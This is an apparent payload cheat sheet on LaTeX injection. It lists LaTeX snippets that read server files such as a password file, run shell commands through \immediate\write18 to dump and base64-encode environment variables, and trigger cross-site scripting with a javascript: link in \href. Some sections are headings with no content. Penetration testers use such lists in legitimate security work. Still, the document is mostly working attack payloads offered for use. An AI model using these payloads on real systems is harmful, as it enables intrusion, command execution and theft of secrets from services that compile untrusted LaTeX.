Skip to content

LaTex Injection

Read file

\include{password} # load .tex file

Read single lined file

\read\file to\line

Read multiple lined file

    \read\file to\fileline

Read text file, keep the formatting


Write file


Command execution

The input of the command will be redirected to stdin, use a temp file to get it.

\immediate\write18{env > output}

If you get any LaTex error, consider using base64 to get the result without bad characters

\immediate\write18{env | base64 > test.tex}

Cross Site Scripting

From @EdOverflow


Live example at$\href{javascript:alert(1)}{Frogs%20find%20bugs}$